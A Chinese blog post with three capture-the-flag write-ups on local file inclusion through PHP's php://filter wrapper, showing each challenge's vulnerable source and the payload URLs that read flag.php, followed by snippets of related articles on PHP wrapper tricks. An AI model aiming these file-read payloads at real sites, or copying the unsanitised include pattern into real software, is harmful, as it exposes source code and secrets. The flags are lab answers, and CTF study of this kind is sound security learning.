PHP-filter协议

最新推荐文章于 2025-04-06 16:49:52 发布
最新推荐文章于 2025-04-06 16:49:52 发布
阅读量298 收藏 3
点赞数 5
CC 4.0 BY-SA版权
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/asdfaa/article/details/125938302

[题目信息]:

题目名称题目难度
PHP-filter协议1

[题目考点]:

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致任意文件读取。

[Flag格式]:

SangFor{nNhU12V9TPu3Jms49aso_mD6bHCotl5I}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

http://分配ip:2020

[题目writeup]:

1、实验主页

2、题解分析

在实验主页上没有发现到源码信息。随意点击后出现图片,在url上发现有跟参数,随机查看源码。

实际显示的为如下图片

可以由此分析category参数可能存在文件包含

通过此方法包含读取flag文件未成功,再次读取index.php文件

/index.php?category=php://filter/read=convert.base64-encode/resource=index

获取到index.php的源代码

<?php
$file = $_GET['category'];
if(isset($file))
{
	if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
		include ($file . '.php');
	}
	else{
		echo "Sorry, we currently only support woofers and meowers.";
	}
}
?>

Base64解码,找到关键代码。分析,发现$file参数值必须带有woofers或者meowers或者index,而我们的目标是读取flag.php的内容。

php://filter伪协议可以支持任意嵌套协议,那么可以尝试构造payload:

/index.php?category=php://filter/read=convert.base64-encode/index/resource=flag

[题目信息]:

题目名称题目难度
PHP-filter协议1

[题目考点]:

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致任意文件读取。

[Flag格式]:

SangFor{DNWIN1VuxZqBnORb9KKmuirmWKmRBTr2}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

http://分配ip:2056

[题目writeup]:

1、实验主页

2、题解分析

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($file){
    if(preg_match('/\.\.\/|http|https|data|input|rot13|base64|string/i',$file)){
        die("hacker!");
    }else{
        return $file;
    }
}
$file=$_GET['file'];
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
}

前置知识

is_file() 函数检查指定的文件名是否是正常的文件

filter() 函数用于对来自非安全来源的数据(比如用户输入)进行验证和过滤

分析代码逻辑,首先定义了filter()方法对用户输入进行验证和过滤,不能含有正则表达式当中的字符串。

在第二个if条件判断中,如果传入的值不是正常存在的文件,并且通过filter()方法检验通过即可调用highlight_file打印源码。

考虑以上绕过的点,只需要通过php伪协议即可获取到flag

?file=php://filter/resource=flag.php

[题目信息]:

题目名称题目难度
PHP-filter协议1

[题目考点]:

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致任意文件读取。

[Flag格式]:

SangFor{mS1-JG3tES0kOLkM5houS8S67Eu9rPG2}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

http://分配ip:2058

[题目writeup]:

1、实验主页

2、题解分析

<?php
error_reporting(0);
highlight_file(__FILE__);
function filter($file){
    if(preg_match('/compress|root|zlib|convert|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
        die('hacker!');
    }else{
        return $file;
    }
}
$file=$_GET['file'];
echo "tql,xdm";
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
}

分析代码逻辑,与上一题相同。首先定义了filter()方法对用户输入进行验证和过滤,不能含有正则表达式当中的字符串,并且过滤了上一题所使用的zlib协议。

在第二个if条件判断中,如果传入的值不是正常存在的文件,并且通过filter()方法检验通过即可调用highlight_file打印源码。

?file=php://filter/resource=flag.php

ctf之php伪协议的使用
一只菜鸟呀的博客
05-20 1767
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。当它与包含函数结合时,php://filter流会被当作php文件执行。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。
PHP Filter 伪协议
weixin_55710577的博客
06-05 2175
php filter 伪协议
PHP伪协议filter详解,php://filter协议过滤器
热门推荐
wangyuxiang946的博客
06-12 1万+
PHP://filter协议 PHP filter 过滤器
php伪协议xss,filter_var 函数()使用javascript伪协议绕过执行xss
weixin_34480323的博客
04-08 332
escape过滤器来过滤link,而实际上这里的escape过滤器,是用PHP内置函数htmlspecialchars来实现的htmlspecialchars函数定义如下:htmlspecialchars:(PHP 4, PHP 5, PHP 7)功能:将特殊字符转换为 HTML 实体定义:stringhtmlspecialchars( string$string[, i...
php://filter伪协议(总结)
leekos的博客,分享web安全相关知识~
01-07 1万+
php://filter伪协议(总结)
PHP Filter伪协议Trick总结
gental_z的博客
01-04 1万+
PHP Filter伪协议Trick总结 前言:最近在学习的过程中碰到了很多的filter协议的小trick,在此做一个总结以及对filter协议的一些探索。 PHP Filter协议介绍 ​ php://filterphp中独有的一种协议,它是一种过滤器,可以作为一个中间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据,且在读取和写入之前对数据进行一些过滤,例如base64编码处理,rot13处理等。官方解释为: php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这
http-dbal-filter
03-28
《深入理解PHP中的HTTP-DBAL-Filter》 在PHP编程中,我们常常会遇到处理HTTP请求和数据库操作的情况。HTTP-DBAL-Filter是一个专为处理这些需求设计的组件,它结合了HTTP请求处理与数据库抽象层(DBAL)的数据过滤...
CTF--php伪协议结合Base64绕过
weixin_74020633的博客
11-20 1223
base64编码是一种只接受[A-Za-z0-9+/]的编码方式,也就是说base64只包含了64个可打印的字符,当需要编码的字符串中出现了这64个字符外的其他字符,在base64-decode时会被跳过,base64-decode仅仅会将可识别的字符编码后重新组成新的字符串。在ctf中,base64是比较常见的编码方式,在做题的时候发现自己对于base64的编码和解码规则不是很了解,并且恰好碰到了类似的题目,在翻阅了大佬的文章后记录一下,对于base64编码的学习和一个工具。
文件包含-伪协议filter
08-22
PHP中,可以使用php://filter伪协议来读取文件内容并对其进行处理。例如,使用php://filter/resource=来读取文件内容,php://filter/read=convert.base64-encode/resource=可以将文件内容以base64编码输出。 ...
文件包含漏洞-伪协议
weixin_53303754的博客
10-15 430
File://、php://filterphp://input、data://、http://、phar://、zip://
PHP伪协议
m0_75178803的博客
04-02 1274
可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而导致任意文件读取协议参数:常用的有。
浅谈php filter伪协议及一些绕过姿势
2301_77004573的博客
05-09 3204
(3).iconv.<input-encoding>.<output-encoding>或<input-encoding>/<output-encoding>:将输入的字符串编码转换成输出指定的编码。补充姿势:可以利用管道符进行多次编码如:php://filter/read=convert.base64-encode|convert.base64-encode/resource=文件名。例如最基础的:php://filter=convert.base64-encode/resource=文件名。
【网络安全篇】php伪协议-漏洞及其原理
最新发布
ALLEN'Blog
04-06 615
🏆今日学习目标:🍀学习php伪协议✅创作者:贤鱼⏰预计时间:35分钟🎉个人主页:贤鱼的个人主页🔥专栏系列:网络安全🍁贤鱼的个人社区,欢迎你的加入贤鱼摆烂团🍁如果有需要可以查看下面文章25分钟了解phpphp基础。
phpfilter的妙用
weixin_44576725的博客
04-14 4957
php://filter的妙用 php://filterPHP中独有的协议,利用这个协议可以创造很多“妙用”。 php://filter php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、file()和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。 php://filter 目标使用以下的参数作为它路径的一部分。 复合过滤链能够在一个路径上指定。
php://filter
2202_75317918的博客
04-12 4052
php://filter
[php知识点]PHP伪协议
Landasika的博客
05-17 9354
目录 一、前言1、什么是PHP伪协议2、什么时候用PHP伪协议include和require函数include和include_once的区别(require与require_once的区别)highlight_file()和show_source()readfile和file_get_contents和filefile_put_contentsfopen二、PHP伪协议file://...
welcome to the bugkuctf(php://input和php://filter伪协议
wssmiss的博客
07-12 1190
题目 解题思路 查看源代码 源码审计: user存在,且是一个文件,通过file_get_contents()将文件读入字符串r==“welcome to the bugkuctf” 之后会打印输出“hello admin”,并且包含file文件。此处根据提示,file应该是hint.php 要想传入一个文件,可以利用php://input伪协议 preg_match()返回 patt...
CTF中遇见的PHP伪协议运用
byxs007的博客
12-15 1万+
关于PHP伪协议中的总结网上已经有很多文章了 LoRexxar的PHP伪协议总结 PHP伪协议 官方文档 以下都是在做CTF题目的时候遇见的一些知识点,每遇到一点就会在这面做一些总结 php://input php://input 是个可以访问请求的原始数据的只读流。因为它不依赖于特定的 php.ini 指令。 注:enctype=”multipart/form-d
php伪协议の分类 以及 过滤器の使用
烟敛寒林的博客
03-12 1307
本文转载自:https://blog.youkuaiyun.com/Ni9htMar3/article/details/69812306 最近在做ctf的时候,碰见了好几次关于php伪协议的妙用,所以通过学习整理出相关知识 文档:http://cn2.php.net/manual/zh/wrappers.php.php#refsect2-wrappers.php-unknown-descriptioo ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值